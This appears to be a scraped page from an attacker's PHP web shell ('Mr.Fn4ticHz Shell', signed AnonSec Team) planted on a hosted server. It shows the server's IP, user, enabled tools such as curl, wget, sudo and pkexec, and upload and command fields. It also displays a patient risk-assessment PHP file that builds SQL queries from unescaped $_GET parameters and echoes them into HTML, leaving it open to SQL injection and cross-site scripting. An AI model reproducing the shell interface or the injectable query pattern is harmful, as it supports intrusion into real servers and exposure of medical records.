Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 18.119.28.194
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in/show_Risk_Assessment_Status.php
<?php
     session_start();
require_once('../DBManager.php');
require_once('../LoginManager.php');

    include("../dbconnection.php");
		$sql2 ="SELECT * FROM save_activity WHERE srno='$_GET[srno]'";
		$qsql2 = mysqli_query($con,$sql2);
		if($re1 = mysqli_fetch_array($qsql2))
		{
		    
		   //	include 'dashboarddocument.php';
}
?>
	  

  <?php

//include 'fileheader.php';
?>
<style>
                     
       .center {
  /*// border: 1px solid grey;*/
   text-align:;
}
    .center2 {
   border: 5px solid grey;
   text-align:;
}
</style>
 <div class=''>  <?php
//   	$sql ="SELECT * FROM Risk_Assessment_Status WHERE prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]'";
// 		$qsql = mysqli_query($con,$sql);
// 		if($rs = mysqli_fetch_array($qsql))
// 		{
// 		    echo"
// 		    <h3 align='right'><a href='edit_showpage_Risk_Assessment_Status.php?prescriptionid=$rs[prescriptionid]&patientid=$rs[patientid]&surgeryid=$rs[surgeryid]'><i class='fa fa-pencil-square-o'></i>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</a></h3>";
// 		}
		?>
		</div>
<h3 align='center'>Risk Assessment Status</h3>
<div class="container">
    <div class="row">
        <div class="col-sm-6"></div>
        <div class="col-sm-4"></div>
        <div class="col-sm-2">
            <a href="edit_showpage_Risk_Assessment_Status.php?prescriptionid=<?php echo $_GET['prescriptionid'] ?>&patientid=<?php echo $_GET['patientid'] ?>&surgeryid=<?php echo $_GET['surgeryid'] ?>"><i class="fa fa-pencil-square-o" aria-hidden="true" style="font-size:30px;"></i></a>
        </div>
    </div>
</div>
<?php
include("dbconnection.php");
	$sqlpatient = "SELECT * FROM save_activity WHERE  prescriptionid='$_GET[prescriptionid]' AND discription='Pre-Assessment Sheet<br>Risk Assessment Status<br>Doc.no-";
	$qsqlpatient = mysqli_query($con,$sqlpatient);
	if($rsp = mysqli_fetch_array($qsqlpatient))
	{
	    if($rsp[discription]== 'Pre-Assessment Sheet<br>Risk Assessment Status<br>Doc.no-'){
	        echo"<h4>Doc.no : $rsp[srno]</h4>";

} else{
    echo "";
}
       
	}
?>  
 <style>
                     
       .center {
   border: 1px solid grey;
   text-align:;
}
    .center2 {
   border: 5px solid grey;
   text-align:;
}
</style>
 
   <div class='center'>
       <table id='example2' class='table table-bordered table-hover'>
<?php 
		$sql ="SELECT * FROM Risk_Assessment_Status WHERE prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]' AND surgeryid='$_GET[surgeryid]'";
		$qsql = mysqli_query($con,$sql);
		while($rs = mysqli_fetch_array($qsql))
		{
		    echo "
 <tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; Fitness for Procedure: </td>
<td width='50%'>$rs[Fitness_Procedure]</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Risk Factors Present :  </td>
<td width='50%'>$rs[Risk_Factors_Present]</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Plan of Action :  </td>
<td width='50%'>$rs[Plan_Action]</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Arranged units of blood to be kept ready in BTO :  </td>
<td width='50%'>$rs[Arranged_units_blood]</td>
</tr>
";


}
?>

				</table>
</div>


Anon7 - 2022
AnonSec Team